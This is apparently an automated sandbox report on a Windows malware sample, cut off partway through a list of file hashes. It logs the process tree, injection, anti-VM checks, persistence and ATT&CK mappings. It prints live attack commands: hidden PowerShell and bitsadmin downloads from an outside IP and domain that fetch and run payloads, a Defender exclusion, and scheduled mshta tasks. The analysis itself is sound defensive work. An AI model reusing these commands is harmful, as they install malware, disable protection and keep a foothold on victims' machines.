2140	483d2fa8a0d53818306efeb32d3.exe
2820	bb58ec9b46.exe
2780	powershell.exe
1876	08b7add333.exe
1332	bc0ffaf002.exe
2468	1682315e29.exe
1332	bc0ffaf002.exe
1332	bc0ffaf002.exe
1332	bc0ffaf002.exe
1332	bc0ffaf002.exe
2468	1682315e29.exe
2468	1682315e29.exe
2468	1682315e29.exe
2468	1682315e29.exe
2388	c38bb66176.exe
1456	cc9c0966b2.exe
2032	0764c3a87d.exe

Suspicious behavior: MapViewOfSection 2 IoCs

pid	Process
1068	SplashWin.exe
1220	cmd.exe

Suspicious use of AdjustPrivilegeToken 9 IoCs

description	pid	Process
Token: SeDebugPrivilege	1616	powershell.exe
Token: SeDebugPrivilege	2196	powershell.exe
Token: SeDebugPrivilege	2560	powershell.exe
Token: SeDebugPrivilege	2000	powershell.exe
Token: SeDebugPrivilege	1396	powershell.exe
Token: SeDebugPrivilege	1364	ce4pMzk.exe
Token: SeDebugPrivilege	2780	powershell.exe
Token: SeDebugPrivilege	1892	272923809e.exe
Token: SeDebugPrivilege	2088	taskkill.exe

Suspicious use of FindShellTrayWindow 9 IoCs

pid	Process
2988	0cacf34f65fd5bc90c5abd9387d18deffcca330ff0675241d6cc719f2ee000b3.exe
2448	b59d803e02.exe
2448	b59d803e02.exe
2448	b59d803e02.exe
2032	0764c3a87d.exe
2032	0764c3a87d.exe
2032	0764c3a87d.exe
2032	0764c3a87d.exe
2032	0764c3a87d.exe

Suspicious use of SendNotifyMessage 8 IoCs

pid	Process
2448	b59d803e02.exe
2448	b59d803e02.exe
2448	b59d803e02.exe
2032	0764c3a87d.exe
2032	0764c3a87d.exe
2032	0764c3a87d.exe
2032	0764c3a87d.exe
2032	0764c3a87d.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2988 wrote to memory of 2956	2988	0cacf34f65fd5bc90c5abd9387d18deffcca330ff0675241d6cc719f2ee000b3.exe	31
PID 2988 wrote to memory of 2956	2988	0cacf34f65fd5bc90c5abd9387d18deffcca330ff0675241d6cc719f2ee000b3.exe	31
PID 2988 wrote to memory of 2956	2988	0cacf34f65fd5bc90c5abd9387d18deffcca330ff0675241d6cc719f2ee000b3.exe	31
PID 2988 wrote to memory of 2956	2988	0cacf34f65fd5bc90c5abd9387d18deffcca330ff0675241d6cc719f2ee000b3.exe	31
PID 2956 wrote to memory of 2612	2956	rapes.exe	33
PID 2956 wrote to memory of 2612	2956	rapes.exe	33
PID 2956 wrote to memory of 2612	2956	rapes.exe	33
PID 2956 wrote to memory of 2612	2956	rapes.exe	33
PID 2956 wrote to memory of 2612	2956	rapes.exe	33
PID 2956 wrote to memory of 2612	2956	rapes.exe	33
PID 2956 wrote to memory of 2612	2956	rapes.exe	33
PID 2612 wrote to memory of 932	2612	Y87Oyyz.exe	34
PID 2612 wrote to memory of 932	2612	Y87Oyyz.exe	34
PID 2612 wrote to memory of 932	2612	Y87Oyyz.exe	34
PID 2612 wrote to memory of 932	2612	Y87Oyyz.exe	34
PID 2612 wrote to memory of 932	2612	Y87Oyyz.exe	34
PID 2612 wrote to memory of 932	2612	Y87Oyyz.exe	34
PID 2612 wrote to memory of 932	2612	Y87Oyyz.exe	34
PID 932 wrote to memory of 2292	932	Y87Oyyz.exe	35
PID 932 wrote to memory of 2292	932	Y87Oyyz.exe	35
PID 932 wrote to memory of 2292	932	Y87Oyyz.exe	35
PID 932 wrote to memory of 2292	932	Y87Oyyz.exe	35
PID 2292 wrote to memory of 1068	2292	SplashWin.exe	36
PID 2292 wrote to memory of 1068	2292	SplashWin.exe	36
PID 2292 wrote to memory of 1068	2292	SplashWin.exe	36
PID 2292 wrote to memory of 1068	2292	SplashWin.exe	36
PID 1068 wrote to memory of 1220	1068	SplashWin.exe	37
PID 1068 wrote to memory of 1220	1068	SplashWin.exe	37
PID 1068 wrote to memory of 1220	1068	SplashWin.exe	37
PID 1068 wrote to memory of 1220	1068	SplashWin.exe	37
PID 2956 wrote to memory of 1844	2956	rapes.exe	39
PID 2956 wrote to memory of 1844	2956	rapes.exe	39
PID 2956 wrote to memory of 1844	2956	rapes.exe	39
PID 2956 wrote to memory of 1844	2956	rapes.exe	39
PID 1844 wrote to memory of 2244	1844	cmd.exe	41
PID 1844 wrote to memory of 2244	1844	cmd.exe	41
PID 1844 wrote to memory of 2244	1844	cmd.exe	41
PID 1844 wrote to memory of 2244	1844	cmd.exe	41
PID 1844 wrote to memory of 444	1844	cmd.exe	42
PID 1844 wrote to memory of 444	1844	cmd.exe	42
PID 1844 wrote to memory of 444	1844	cmd.exe	42
PID 1844 wrote to memory of 444	1844	cmd.exe	42
PID 1844 wrote to memory of 1316	1844	cmd.exe	43
PID 1844 wrote to memory of 1316	1844	cmd.exe	43
PID 1844 wrote to memory of 1316	1844	cmd.exe	43
PID 1844 wrote to memory of 1316	1844	cmd.exe	43
PID 1844 wrote to memory of 1908	1844	cmd.exe	44
PID 1844 wrote to memory of 1908	1844	cmd.exe	44
PID 1844 wrote to memory of 1908	1844	cmd.exe	44
PID 1844 wrote to memory of 1908	1844	cmd.exe	44
PID 1068 wrote to memory of 1220	1068	SplashWin.exe	37
PID 1220 wrote to memory of 1880	1220	cmd.exe	45
PID 1220 wrote to memory of 1880	1220	cmd.exe	45
PID 1220 wrote to memory of 1880	1220	cmd.exe	45
PID 1220 wrote to memory of 1880	1220	cmd.exe	45
PID 1220 wrote to memory of 1880	1220	cmd.exe	45
PID 1220 wrote to memory of 1880	1220	cmd.exe	45
PID 2956 wrote to memory of 2448	2956	rapes.exe	46
PID 2956 wrote to memory of 2448	2956	rapes.exe	46
PID 2956 wrote to memory of 2448	2956	rapes.exe	46
PID 2956 wrote to memory of 2448	2956	rapes.exe	46
PID 2448 wrote to memory of 3016	2448	b59d803e02.exe	47
PID 2448 wrote to memory of 3016	2448	b59d803e02.exe	47
PID 2448 wrote to memory of 3016	2448	b59d803e02.exe	47

C:\Users\Admin\AppData\Local\Temp\0cacf34f65fd5bc90c5abd9387d18deffcca330ff0675241d6cc719f2ee000b3.exe
"C:\Users\Admin\AppData\Local\Temp\0cacf34f65fd5bc90c5abd9387d18deffcca330ff0675241d6cc719f2ee000b3.exe"
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Identifies Wine through registry keys
- Loads dropped DLL
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:2988
- C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
  "C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"
  2⤵
  - Identifies VirtualBox via ACPI registry values (likely anti-VM)
  - Downloads MZ/PE file
  - Checks BIOS information in registry
  - Executes dropped EXE
  - Identifies Wine through registry keys
  - Loads dropped DLL
  - Adds Run key to start application
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of WriteProcessMemory
  PID:2956
- - C:\Users\Admin\AppData\Local\Temp\10101640101\Y87Oyyz.exe
    "C:\Users\Admin\AppData\Local\Temp\10101640101\Y87Oyyz.exe"
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:2612
  - - C:\Windows\Temp\{A2163232-208D-4EA2-8B9D-C476A64F4582}\.cr\Y87Oyyz.exe
      "C:\Windows\Temp\{A2163232-208D-4EA2-8B9D-C476A64F4582}\.cr\Y87Oyyz.exe" -burn.clean.room="C:\Users\Admin\AppData\Local\Temp\10101640101\Y87Oyyz.exe" -burn.filehandle.attached=180 -burn.filehandle.self=188
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:932
    - - C:\Windows\Temp\{EBF13E6F-84B0-4CB1-876A-619C4E46A136}\.ba\SplashWin.exe
        
        C:\Windows\Temp\{EBF13E6F-84B0-4CB1-876A-619C4E46A136}\.ba\SplashWin.exe
        5⤵
        Executes dropped EXE
        Loads dropped DLL
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of WriteProcessMemory
        
        PID:2292
      - C:\Users\Admin\AppData\Roaming\osd_patch_beta\SplashWin.exe
        
        C:\Users\Admin\AppData\Roaming\osd_patch_beta\SplashWin.exe
        6⤵
        Executes dropped EXE
        Loads dropped DLL
        Suspicious use of SetThreadContext
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious behavior: MapViewOfSection
        Suspicious use of WriteProcessMemory
        
        PID:1068
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\SysWOW64\cmd.exe
        7⤵
        Loads dropped DLL
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious behavior: MapViewOfSection
        Suspicious use of WriteProcessMemory
        
        PID:1220
        
        C:\Users\Admin\AppData\Local\Temp\Syncsign_v1.exe
        
        C:\Users\Admin\AppData\Local\Temp\Syncsign_v1.exe
        8⤵
        Loads dropped DLL
        
        PID:1880
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\10101971121\fCsM05d.cmd"
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:1844
  - - C:\Windows\SysWOW64\fltMC.exe
      fltmc
      4⤵
      System Location Discovery: System Language Discovery
      PID:2244
  - - C:\Windows\SysWOW64\bitsadmin.exe
      bitsadmin /transfer "DownloadVrep" https://authenticatior.com/vrep.msi "C:\Users\Admin\AppData\Local\Temp\vrep_install\vrep.msi"
      4⤵
      Download via BitsAdmin
      System Location Discovery: System Language Discovery
      PID:444
  - - C:\Windows\SysWOW64\bitsadmin.exe
      bitsadmin /transfer "DownloadClient" https://authenticatior.com/Client32.ini "C:\Users\Admin\AppData\Local\Temp\vrep_install\Client32.ini"
      4⤵
      Download via BitsAdmin
      System Location Discovery: System Language Discovery
      PID:1316
  - - C:\Windows\SysWOW64\bitsadmin.exe
      bitsadmin /transfer "DownloadLicense" https://authenticatior.com/NSM.lic "C:\Users\Admin\AppData\Local\Temp\vrep_install\NSM.lic"
      4⤵
      Download via BitsAdmin
      System Location Discovery: System Language Discovery
      PID:1908
- - C:\Users\Admin\AppData\Local\Temp\10104610101\b59d803e02.exe
    "C:\Users\Admin\AppData\Local\Temp\10104610101\b59d803e02.exe"
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Suspicious use of FindShellTrayWindow
    - Suspicious use of SendNotifyMessage
    - Suspicious use of WriteProcessMemory
    PID:2448
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c schtasks /create /tn BgCF3maJ3HB /tr "mshta C:\Users\Admin\AppData\Local\Temp\SmcoGUujt.hta" /sc minute /mo 25 /ru "Admin" /f
      4⤵
      System Location Discovery: System Language Discovery
      PID:3016
    - - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /create /tn BgCF3maJ3HB /tr "mshta C:\Users\Admin\AppData\Local\Temp\SmcoGUujt.hta" /sc minute /mo 25 /ru "Admin" /f
        5⤵
        System Location Discovery: System Language Discovery
        Scheduled Task/Job: Scheduled Task
        
        PID:2720
  - - C:\Windows\SysWOW64\mshta.exe
      mshta C:\Users\Admin\AppData\Local\Temp\SmcoGUujt.hta
      4⤵
      System Location Discovery: System Language Discovery
      Modifies Internet Explorer settings
      PID:2912
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'KWU4HQYTP3YKRSPXDCTBVXMENMNRNFI0.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
        5⤵
        Blocklisted process makes network request
        Command and Scripting Interpreter: PowerShell
        Downloads MZ/PE file
        Loads dropped DLL
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1616
      - C:\Users\Admin\AppData\Local\TempKWU4HQYTP3YKRSPXDCTBVXMENMNRNFI0.EXE
        
        "C:\Users\Admin\AppData\Local\TempKWU4HQYTP3YKRSPXDCTBVXMENMNRNFI0.EXE"
        6⤵
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Checks BIOS information in registry
        Executes dropped EXE
        Identifies Wine through registry keys
        Suspicious use of NtSetInformationThreadHideFromDebugger
        Suspicious behavior: EnumeratesProcesses
        
        PID:1548
- - C:\Windows\SysWOW64\cmd.exe
    cmd /c ""C:\Users\Admin\AppData\Local\Temp\10104620121\am_no.cmd" "
    3⤵
    - System Location Discovery: System Language Discovery
    PID:3056
  - - C:\Windows\SysWOW64\timeout.exe
      timeout /t 2
      4⤵
      System Location Discovery: System Language Discovery
      Delays execution with timeout.exe
      PID:2860
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
      4⤵
      System Location Discovery: System Language Discovery
      PID:1052
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
        5⤵
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2196
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"
      4⤵
      System Location Discovery: System Language Discovery
      PID:496
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"
        5⤵
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2560
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"
      4⤵
      System Location Discovery: System Language Discovery
      PID:2012
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"
        5⤵
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2000
  - - C:\Windows\SysWOW64\schtasks.exe
      schtasks /create /tn "iVLnzmaO7Ij" /tr "mshta \"C:\Temp\l74Idbf10.hta\"" /sc minute /mo 25 /ru "Admin" /f
      4⤵
      System Location Discovery: System Language Discovery
      Scheduled Task/Job: Scheduled Task
      PID:996
  - - C:\Windows\SysWOW64\mshta.exe
      mshta "C:\Temp\l74Idbf10.hta"
      4⤵
      System Location Discovery: System Language Discovery
      Modifies Internet Explorer settings
      PID:2584
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
        5⤵
        Blocklisted process makes network request
        Command and Scripting Interpreter: PowerShell
        Downloads MZ/PE file
        Loads dropped DLL
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1396
      - C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe
        
        "C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"
        6⤵
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Checks BIOS information in registry
        Executes dropped EXE
        Identifies Wine through registry keys
        Suspicious use of NtSetInformationThreadHideFromDebugger
        Suspicious behavior: EnumeratesProcesses
        
        PID:2140
- - C:\Users\Admin\AppData\Local\Temp\10104900101\ce4pMzk.exe
    "C:\Users\Admin\AppData\Local\Temp\10104900101\ce4pMzk.exe"
    3⤵
    - Downloads MZ/PE file
    - Executes dropped EXE
    - Loads dropped DLL
    - Adds Run key to start application
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1364
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Local\Caches\ElWUewDf\Anubis.exe""
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2780
  - - C:\Users\Admin\AppData\Roaming\HeCsH61.exe
      "C:\Users\Admin\AppData\Roaming\HeCsH61.exe"
      4⤵
      Executes dropped EXE
      PID:1880
- - C:\Users\Admin\AppData\Local\Temp\10105090101\bb58ec9b46.exe
    "C:\Users\Admin\AppData\Local\Temp\10105090101\bb58ec9b46.exe"
    3⤵
    - Identifies VirtualBox via ACPI registry values (likely anti-VM)
    - Checks BIOS information in registry
    - Executes dropped EXE
    - Identifies Wine through registry keys
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - Suspicious use of SetThreadContext
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    PID:2820
  - - C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
      "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
      4⤵
      Downloads MZ/PE file
      Loads dropped DLL
      System Location Discovery: System Language Discovery
      PID:2092
- - C:\Users\Admin\AppData\Local\Temp\10105100101\272923809e.exe
    "C:\Users\Admin\AppData\Local\Temp\10105100101\272923809e.exe"
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - Suspicious use of SetThreadContext
    - System Location Discovery: System Language Discovery
    - Suspicious use of AdjustPrivilegeToken
    PID:1892
  - - C:\Users\Admin\AppData\Local\Temp\10105100101\272923809e.exe
      "C:\Users\Admin\AppData\Local\Temp\10105100101\272923809e.exe"
      4⤵
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      PID:2036
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 2036 -s 1000
        5⤵
        Loads dropped DLL
        Program crash
        
        PID:2000
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 1892 -s 508
      4⤵
      Loads dropped DLL
      Program crash
      PID:1340
- - C:\Users\Admin\AppData\Local\Temp\10105110101\08b7add333.exe
    "C:\Users\Admin\AppData\Local\Temp\10105110101\08b7add333.exe"
    3⤵
    - Identifies VirtualBox via ACPI registry values (likely anti-VM)
    - Checks BIOS information in registry
    - Executes dropped EXE
    - Identifies Wine through registry keys
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - Suspicious use of SetThreadContext
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    PID:1876
  - - C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
      "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
      4⤵
      Downloads MZ/PE file
      Loads dropped DLL
      System Location Discovery: System Language Discovery
      PID:1608
- - C:\Users\Admin\AppData\Local\Temp\10105120101\bc0ffaf002.exe
    "C:\Users\Admin\AppData\Local\Temp\10105120101\bc0ffaf002.exe"
    3⤵
    - Identifies VirtualBox via ACPI registry values (likely anti-VM)
    - Checks BIOS information in registry
    - Executes dropped EXE
    - Identifies Wine through registry keys
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - System Location Discovery: System Language Discovery
    - Modifies system certificate store
    - Suspicious behavior: EnumeratesProcesses
    PID:1332
- - C:\Users\Admin\AppData\Local\Temp\10105130101\1682315e29.exe
    "C:\Users\Admin\AppData\Local\Temp\10105130101\1682315e29.exe"
    3⤵
    - Identifies VirtualBox via ACPI registry values (likely anti-VM)
    - Checks BIOS information in registry
    - Executes dropped EXE
    - Identifies Wine through registry keys
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - System Location Discovery: System Language Discovery
    - Modifies system certificate store
    - Suspicious behavior: EnumeratesProcesses
    PID:2468
- - C:\Users\Admin\AppData\Local\Temp\10105140101\c38bb66176.exe
    "C:\Users\Admin\AppData\Local\Temp\10105140101\c38bb66176.exe"
    3⤵
    - Identifies VirtualBox via ACPI registry values (likely anti-VM)
    - Checks BIOS information in registry
    - Executes dropped EXE
    - Identifies Wine through registry keys
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    PID:2388
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 2388 -s 1208
      4⤵
      Loads dropped DLL
      Program crash
      PID:2368
- - C:\Users\Admin\AppData\Local\Temp\10105150101\cc9c0966b2.exe
    "C:\Users\Admin\AppData\Local\Temp\10105150101\cc9c0966b2.exe"
    3⤵
    - Identifies VirtualBox via ACPI registry values (likely anti-VM)
    - Checks BIOS information in registry
    - Executes dropped EXE
    - Identifies Wine through registry keys
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    PID:1456
- - C:\Users\Admin\AppData\Local\Temp\10105160101\0764c3a87d.exe
    "C:\Users\Admin\AppData\Local\Temp\10105160101\0764c3a87d.exe"
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of FindShellTrayWindow
    - Suspicious use of SendNotifyMessage
    PID:2032
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /F /IM firefox.exe /T
      4⤵
      System Location Discovery: System Language Discovery
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:2088

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Persistence

BITS Jobs

T1197

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

BITS Jobs

T1197

Modify Registry

T1112

Subvert Trust Controls

T1553

Install Root Certificate

T1553.004

Virtualization/Sandbox Evasion

T1497

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Browser Information Discovery

T1217

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Virtualization/Sandbox Evasion

T1497

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\07E47DDF088088BD.dat

Filesize
46KB

MD5
02d2c46697e3714e49f46b680b9a6b83

SHA1
84f98b56d49f01e9b6b76a4e21accf64fd319140

SHA256
522cad95d3fa6ebb3274709b8d09bbb1ca37389d0a924cd29e934a75aa04c6c9

SHA512
60348a145bfc71b1e07cb35fa79ab5ff472a3d0a557741ea2d39b3772bc395b86e261bd616f65307ae0d997294e49b5548d32f11e86ef3e2704959ca63da8aac

Download Submit
C:\Temp\l74Idbf10.hta

Filesize
779B

MD5
39c8cd50176057af3728802964f92d49

SHA1
68fc10a10997d7ad00142fc0de393fe3500c8017

SHA256
f685edf8437c0b505f5e366d8b1cb79e7770361cc4906240e7f8c8ad32c94e84

SHA512
cf563b2b5a3553acf3a91298936b904abf87620c2fc582bcdb45dec5d4b877bef5ae81feae4b741e1aee1a916e543b5f6914d9c494d2aa33bc6f15c6fc904cc6

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015

Filesize
71KB

MD5
83142242e97b8953c386f988aa694e4a

SHA1
833ed12fc15b356136dcdd27c61a50f59c5c7d50

SHA256
d72761e1a334a754ce8250e3af7ea4bf25301040929fd88cf9e50b4a9197d755

SHA512
bb6da177bd16d163f377d9b4c63f6d535804137887684c113cc2f643ceab4f34338c06b5a29213c23d375e95d22ef417eac928822dfb3688ce9e2de9d5242d10

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\FN7UQQ6Z\service[1].htm

Filesize
1B

MD5
cfcd208495d565ef66e7dff9f98764da

SHA1
b6589fc6ab0dc82cf12099d1c2d40ab994e8410c

SHA256
5feceb66ffc86f38d952786c6d696c79c2dbc239dd4e91b46729d73a27fb57e9

SHA512
31bca02094eb78126a517b206a88c73cfa9ec6f704c7030d18212cace820f025f00bf0ea68dbf3f3a5436ca63b53bf7bf80ad8d5de7d8359d0b7fed9dbc3ab99

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\HIG00EVV\soft[1]

Filesize
987KB

MD5
f49d1aaae28b92052e997480c504aa3b

SHA1
a422f6403847405cee6068f3394bb151d8591fb5

SHA256
81e31780a5f2078284b011c720261797eb8dd85e1b95a657dbce7ac31e9df1f0

SHA512
41f715eea031fd8d7d3a22d88e0199277db2f86be73f830819288c0f0665e81a314be6d356fdc66069cb3f2abf0dd02aaa49ac3732f3f44a533fcec0dfd6f773

Download Submit
C:\Users\Admin\AppData\Local\Temp\10101640101\Y87Oyyz.exe

Filesize
5.7MB

MD5
5fb40d81dac830b3958703aa33953f4f

SHA1
8f4689497df5c88683299182b8b888046f38c86a

SHA256
b2395af2b5497ded848bfffc2192747510420b0a7bab9897322aed765c66d9dc

SHA512
80b400bb79c4cbed1fb35af0fae1b88b399d679f7c99c625214082d143f51d381436abb27284b0205bdacf38cafa742a32c46ce8136ad7684d566d2e19bfab8e

Download Submit
C:\Users\Admin\AppData\Local\Temp\10101971121\fCsM05d.cmd

Filesize
1KB

MD5
9e4466ae223671f3afda11c6c1e107d1

SHA1
438b65cb77e77a41e48cdb16dc3dee191c2729c7

SHA256
ab289a1dc9ad423e385c539a539feec8c04604d17656c663e52e02ceebd4409f

SHA512
3f7be864e567e1906f9227fe4b8e47a9f16032d732aecfc7256e581939e3b810bc6e696c4a80be670624e5fd08c336d539e23ed825bd823614a2fcda3b21f2aa

Download Submit
C:\Users\Admin\AppData\Local\Temp\10102370101\SvhQA35.exe

Filesize
3.2MB

MD5
fbf88fa362c98909267916d2ba267b12

SHA1
8b4a93a04a7a12a77a706aa1861f4e3f860fc83d

SHA256
7016208e4583481ea06f1cedbe445b8d047998b2706927eda907aafa08901e64

SHA512
89a1e27438dd73dcb0df47e8716a254c602a2c911ee2013894ded0433fefb0810a755d481b6d5f555c60202aeea9baea87eb47248040d863f5cea3c41f430070

Download Submit
C:\Users\Admin\AppData\Local\Temp\10104610101\b59d803e02.exe

Filesize
938KB

MD5
c22f10f8d3bf4ff0453328c6a216e1ae

SHA1
8cb1fd2f3bc806eb3fd20015b2306ec2b4d1cafe

SHA256
3994257b564e4b92bba726f86015fe74e1bb69af314cf24190cc468b6bfd927d

SHA512
b9c961ebfc0c3ffc212e75775f301dafe67d158a586efa084faf8817b789218196997f7ba7b5b0a99b8a78e509584764e55e73f9117b304f8caf7a63575b6214

Download Submit
C:\Users\Admin\AppData\Local\Temp\10104620121\am_no.cmd

Filesize
1KB

MD5
cedac8d9ac1fbd8d4cfc76ebe20d37f9

SHA1
b0db8b540841091f32a91fd8b7abcd81d9632802

SHA256
5e951726842c371240a6af79d8da7170180f256df94eac5966c07f04ef4d120b

SHA512
ce383ffef8c3c04983e752b7f201b5df2289af057e819cdf7310a55a295790935a70e6a0784a6fd1d6898564a3babab1ffcfbaa0cc0d36e5e042adeb3c293fa5

Download Submit
C:\Users\Admin\AppData\Local\Temp\10104900101\ce4pMzk.exe

Filesize
48KB

MD5
d39df45e0030e02f7e5035386244a523

SHA1
9ae72545a0b6004cdab34f56031dc1c8aa146cc9

SHA256
df468fc510aec82c827987f54b824b978dd71301f93d18d71e704727d6dfdfa2

SHA512
69866ba5b53d1183a0899e3d22ff06111ae2e8df429beeb853c89f3ed0afb015dd4139b1c507566ffb0fe171a4ff1b318247b7a568dc492d9f71266f5c848a64

Download Submit
C:\Users\Admin\AppData\Local\Temp\10105090101\bb58ec9b46.exe

Filesize
3.7MB

MD5
4769a99eadbd516c17b7f4c541b87003

SHA1
cfe5a9970182cf428919e9f110a63df37d0eee06

SHA256
446ee955b11dbd350c8d44825c88d7846cf6c88c1604b1908739b2ec8b1cfc3e

SHA512
36146efedbf0780bc6fe459f5c649549b79e79c3908593cc1471f6ed2bd79e1348353d2861a48364aaa86dd5c1a59f7d874811c4c5bcc843e459230c7afb0a91

Download Submit
C:\Users\Admin\AppData\Local\Temp\10105100101\272923809e.exe

Filesize
445KB

MD5
